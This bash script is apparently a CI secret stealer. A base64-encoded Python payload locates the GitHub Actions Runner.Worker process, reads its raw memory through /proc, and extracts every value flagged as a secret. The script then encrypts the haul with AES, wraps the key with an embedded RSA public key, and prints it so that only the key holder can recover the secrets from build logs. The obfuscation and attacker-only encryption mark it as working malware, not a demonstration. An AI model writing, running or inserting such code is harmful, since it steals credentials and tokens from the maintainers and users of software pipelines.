#!/bin/bash
set -e

PUBKEY='-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAr/6v6llaSyFR+fvsNPyD
Phrlf23nM+y4ZxRAYAkzTMz8++BptEQkzASA01yOU7rhBifqfo+OWGd39J1oGRbP
QQoNIojig41eXL+roB3dG+Vx42zhBlgJttd2YzqwrjeB1Zt5DuCGa9Q+U0ySnt7H
KMwhY78/Wy/7cDzH8KcOu5DPrIlLkONyzcwc/9IVbWrzWpwIktuc+QwSKBRGI8Bh
bamC/S6G7UaDdhK+n00la1zMvzw+NbXwppyJstN5oMkEVVPQ6jH43Al+26Am2Gw8
NdNgnLjnBt5gfQg0NeuvpiFRePvdVmTaQ5ahjRzpVry3TCH6f/V42NZ/ebNgnjPy
oe5QJQMNYGQ834cRBjl8s5775DVY30ie/Bbt0T1deT+OPQTFxZwto1U3BlW9RDQq
KS6CLYMPzztP7pOcJhAJJnTrgjIgiDLQ9ZwpKiL1z7fR0V2CyYIgVAuf7Q3aJd7L
gcvlFnjLe3wgcgt9vcmzVM4sefcRte7j7xgziujZiTK6WB1BeNaIJ713RHWZvqHS
Oj98k3oRbxt9M0xiM6VsWvQUAajMbzqvb1u7FpfMZN8/Chl9KN8Tj1RibGzASH0i
L2arLQbLi87O8cD7smEf4PugI2pgrG8vvGY9R25el3dRmbMnT5eDVnODoa4pykGN
EDZ/IfzbGvDREzhELruFT8cCAwEAAQ==
-----END PUBLIC KEY-----'

SCRIPT_RUNNER_BASE64="IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwoKIyBiYXNlZCBvbiBodHRwczovL2RhdmlkZWJvdmUuY29tL2Jsb2cvP3A9MTYyMAoKaW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgoKZGVmIGdldF9waWQoKToKICAgICMgaHR0cHM6Ly9zdGFja292ZXJmbG93LmNvbS9xdWVzdGlvbnMvMjcwMzY0MC9wcm9jZXNzLWxpc3Qtb24tbGludXgtdmlhLXB5dGhvbgogICAgcGlkcyA9IFtwaWQgZm9yIHBpZCBpbiBvcy5saXN0ZGlyKCcvcHJvYycpIGlmIHBpZC5pc2RpZ2l0KCldCgogICAgZm9yIHBpZCBpbiBwaWRzOgogICAgICAgIHdpdGggb3Blbihvcy5wYXRoLmpvaW4oJy9wcm9jJywgcGlkLCAnY21kbGluZScpLCAncmInKSBhcyBjbWRsaW5lX2Y6CiAgICAgICAgICAgIGlmIGInUnVubmVyLldvcmtlcicgaW4gY21kbGluZV9mLnJlYWQoKToKICAgICAgICAgICAgICAgIHJldHVybiBwaWQKCiAgICByYWlzZSBFeGNlcHRpb24oJ0NhbiBub3QgZ2V0IHBpZCBvZiBSdW5uZXIuV29ya2VyJykKCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcGlkID0gZ2V0X3BpZCgpCiAgICBwcmludChwaWQpCgogICAgbWFwX3BhdGggPSBmIi9wcm9jL3twaWR9L21hcHMiCiAgICBtZW1fcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWVtIgoKICAgIHdpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZiwgb3BlbihtZW1fcGF0aCwgJ3JiJywgMCkgYXMgbWVtX2Y6CiAgICAgICAgZm9yIGxpbmUgaW4gbWFwX2YucmVhZGxpbmVzKCk6ICAjIGZvciBlYWNoIG1hcHBlZCByZWdpb24KICAgICAgICAgICAgbSA9IHJlLm1hdGNoKHInKFswLTlBLUZhLWZdKyktKFswLTlBLUZhLWZdKykgKFstcl0pJywgbGluZSkKICAgICAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgICAgICAgICBlbmQgPSBpbnQobS5ncm91cCgyKSwgMTYpCiAgICAgICAgICAgICAgICAjIGhvdGZpeDogT3ZlcmZsb3dFcnJvcjogUHl0aG9uIGludCB0b28gbGFyZ2UgdG8gY29udmVydCB0byBDIGxvbmcKICAgICAgICAgICAgICAgICMgMTg0NDY3NDQwNzM2OTkwNjU4NTYKICAgICAgICAgICAgICAgIGlmIHN0YXJ0ID4gc3lzLm1heHNpemU6CiAgICAgICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgICAgIG1lbV9mLnNlZWsoc3RhcnQpICAjIHNlZWsgdG8gcmVnaW9uIHN0YXJ0CiAgICAgICAgICAgIAogICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgIGNodW5rID0gbWVtX2YucmVhZChlbmQgLSBzdGFydCkgICMgcmVhZCByZWdpb24gY29udGVudHMKICAgICAgICAgICAgICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZShjaHVuaykKICAgICAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlCg=="

VALUES=$(echo "$SCRIPT_RUNNER_BASE64" | base64 -d | python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0)

DECODED_JSON=$(echo "$VALUES" | base64 -d | base64 -d)

AES_KEY=$(openssl rand -hex 16)

ENC_DATA=$(echo -n "$DECODED_JSON" | openssl enc -aes-256-cbc -pbkdf2 -pass pass:"$AES_KEY" -base64)

echo "$PUBKEY" > pubkey.pem
echo -n "$AES_KEY" > tmp.key

openssl rsautl -encrypt -pkcs -pubin -inkey pubkey.pem -in tmp.key -out tmp_key.enc

ENC_KEY=$(base64 < tmp_key.enc | tr -d '\n')

echo "{\"encrypted\": \"$ENC_DATA\", \"key\": \"$ENC_KEY\"}"

rm -f pubkey.pem tmp.key tmp_key.enc
